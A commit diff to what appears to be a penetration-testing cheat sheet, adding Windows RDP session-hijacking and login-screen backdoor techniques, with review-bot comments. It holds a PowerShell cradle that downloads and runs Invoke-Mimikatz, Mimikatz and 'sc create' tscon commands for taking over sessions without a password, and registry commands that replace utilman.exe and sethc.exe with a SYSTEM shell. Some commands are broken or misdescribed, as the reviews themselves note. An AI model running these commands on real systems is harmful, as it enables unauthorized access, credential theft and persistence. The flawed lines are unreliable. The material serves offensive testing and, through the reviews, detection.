RDP backdoor + RDP session takeover

This commit is contained in:
Swissky 2019-11-26 23:39:14 +01:00
parent 06864b0ff8
commit c60f264664
3 changed files with 43 additions and 0 deletions


@ -124,6 +124,12 @@
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
``` ```
* [ADRecon](https://github.com/sense-of-security/ADRecon)
```powershell
.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
```
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
```powershell ```powershell
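Review bot: the ADRecon example hardcodes `MYAD.net` and `MYAD\myuser` without marking them as placeholders, whereas the neighbouring Invoke-Mimikatz line uses an obviously fake `10.10.10.10`; write them as `<domain>` / `<domain\user>` or add a short note that they are to be replaced, so a reader does not assume a specific domain naming convention is required. A one-line description of what ADRecon collects (it is an assessment script, not an exploitation tool) would also help the entry stand alongside the others in the list.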


@ -70,6 +70,23 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
``` ```
## Mimikatz RDP session takeover
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
```powershell
privilege::debug
token::elevate
ts::remote /id:2
```
```powershell
# get the Session ID you want to hijack
query user
create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
```
## Mimikatz commands ## Mimikatz commands
| Command |Definition| | Command |Definition|
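Review bot: the service-creation line in the second block is missing its `sc` prefix; `create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"` is not a command on its own, and the technique this documents uses `sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"`. The comment `# get the Session ID you want to hijack` also only explains one of the two values: `1` is the target session ID read from `query user`, while `rdp-tcp#55` is the session name the operator is currently in; say so, otherwise both get copied literally. Since this file is read by defenders too, it is worth one line noting that both variants leave clear traces: `ts::remote` needs SYSTEM (hence `token::elevate`), and the `sc create` / `net start` route writes a System log event 7045 (service installed) whose binary path contains `tscon`.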


@ -11,6 +11,7 @@
* [HKLM](#hklm) * [HKLM](#hklm)
* [Services](#services) * [Services](#services)
* [Scheduled Task](#scheduled-task) * [Scheduled Task](#scheduled-task)
* [RDP Backdoor](#rdp-backdoor)
* [References](#references) * [References](#references)
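Review bot: the new table-of-contents entry is placed at the same bullet level as `References`, but the body heading added by this commit is `### RDP Backdoor` while the references heading is `## References`; either promote the heading to `##` or nest the entry under its parent section so the list nesting and the heading levels agree. The `#rdp-backdoor` anchor itself matches the heading text.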
@ -114,6 +115,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D PS C:\> Register-ScheduledTask Backdoor -InputObject $D
``` ```
### RDP Backdoor
#### utilman.exe
At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
```powershell
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
```
#### sethc.exe
Hit F5 a bunch of times when you are at the RDP login screen.
```powershell
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
```
## References ## References
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
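Review bot: both `REG ADD` lines pass the `/d` argument with typographic quotes (`“C:\windows\system32\cmd.exe”`) instead of straight `"`; PowerShell happens to treat the curly characters as string delimiters, but from cmd.exe they are passed through literally and the `Debugger` value ends up containing the quote characters, so the redirect silently does nothing. Use `"C:\windows\system32\cmd.exe"`. The sethc.exe description `Hit F5 a bunch of times` is also wrong: sethc.exe is the Sticky Keys handler, which is triggered by pressing Shift five times, not F5. Since the commands are `reg.exe` invocations rather than PowerShell, a `cmd` fence would be more accurate than `powershell`. Finally, a one-line note that `Debugger` values under `Image File Execution Options` for the accessibility binaries are a well-known persistence indicator worth monitoring would fit the register of this persistence file.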